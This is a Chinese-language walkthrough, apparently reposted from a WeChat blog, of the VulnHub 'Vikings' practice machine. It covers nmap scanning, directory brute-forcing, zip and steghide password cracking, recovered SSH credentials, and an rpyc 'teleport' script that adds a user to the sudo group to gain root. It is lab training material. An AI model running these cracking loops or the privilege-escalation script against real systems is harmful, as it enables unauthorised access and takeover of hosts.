VIKINGS靶场实战

admin 2024年2月22日00:12:59评论14 views字数 1459阅读4分51秒阅读模式

https://download.vulnhub.com/vikings/Vikings.ova

VIKINGS靶场实战

Nmap

nmap -sP 192.168.106.0/24  #对自己的靶机网段进行存活探测,获取靶机地址nmap -T4 -A -p- 192.168.106.132  #对目标进行全端口扫描

VIKINGS靶场实战

WEB

访问页面发现site目录,点击查看后获取到一个新的目录信息

VIKINGS靶场实战

VIKINGS靶场实战

直接探测页面没有发现什么信息,对目标进行目录爆破探测发现:http://192.168.106.132/site/war.txt获取到了一个新的目录war-is-over

VIKINGS靶场实战

VIKINGS靶场实战

尝试base64解解码,通过解码后下载出一个zip文件其中的文件需要密码才可以解压查看zip文件进行解码密码爆破,解压密码为:ragnarok123

VIKINGS靶场实战

VIKINGS靶场实战

解压下来后是一张图片查看隐写文件,发现需要密码可以使用shell命令爆破密码for i in $(cat "dict.txt"); do steghide extract king -p $i; done

VIKINGS靶场实战

VIKINGS靶场实战

使用binwalk对king包含文件进行分析binwalk -B king使用binwalk对king文件进行提取binwalk -e king --run-as=root

VIKINGS靶场实战

VIKINGS靶场实战

查看提取到的文件zip文件内容与user中内容一致//FamousBoatbuilder_floki@vikings                                     //f@m0usboatbuilde7

VIKINGS靶场实战

VIKINGS靶场实战

猜测floki是用户名,f@m0usboatbuilde7 为密码进行ssh连接查看用户下的所有文件内容

VIKINGS靶场实战

VIKINGS靶场实战

通过提示需要使用Collatz 猜想,使用第29个素数为初始值29个素数为:109python实现Collatz 猜想:def collatz_conjecture(i):    c = [i]    while i != 1:        if i % 2 == 1:            i = i * 3 + 1        else:            i = i // 2        if i < 256:            c.append(i)    return cstarting_number = 109resulting_sequence = collatz_conjecture(starting_number)print(resulting_sequence)CyberChef的From Decimal模块转换为asc字符,选择Comma逗号分割CyberChef再加入Strings模块,显示可打印字符,选择最短字符为1

VIKINGS靶场实战

VIKINGS靶场实战

将结果拼接去掉换行符,获取到一个新的字符串mR)|>^/Gky[gz=.F#j5P(使用这个字符串为密码对所有可以登录的用户进行登录成功使用ragnar用户登录成功

VIKINGS靶场实战

三、提权

通过读取.profile的内容发现,rpyc_classic.py脚本可以使用sudo程序

VIKINGS靶场实战

用户有执行权限但是没有修改权限,读取脚本发现使用了rpyc模块rpyc默认监听在18812端口上,可用通过构造teleport方法运行系统命令构造攻击脚本:(将ragnar用户增加sudo权限)cat exp.pyimport rpycdef shell():    import os    os.system("sudo usermod -a -G sudo ragnar")conn = rpyc.classic.connect("localhost")sd = conn.teleport(shell)sd()python3 shell.py  #执行脚本后重新使用ragnar账号进行登录重新登录后直接使用sudo权限提示为root用户

VIKINGS靶场实战

原文始发于微信公众号(渗透笔记):VIKINGS靶场实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月22日00:12:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VIKINGS靶场实战https://cn-sec.com/archives/2496805.html

发表评论

匿名网友 填写信息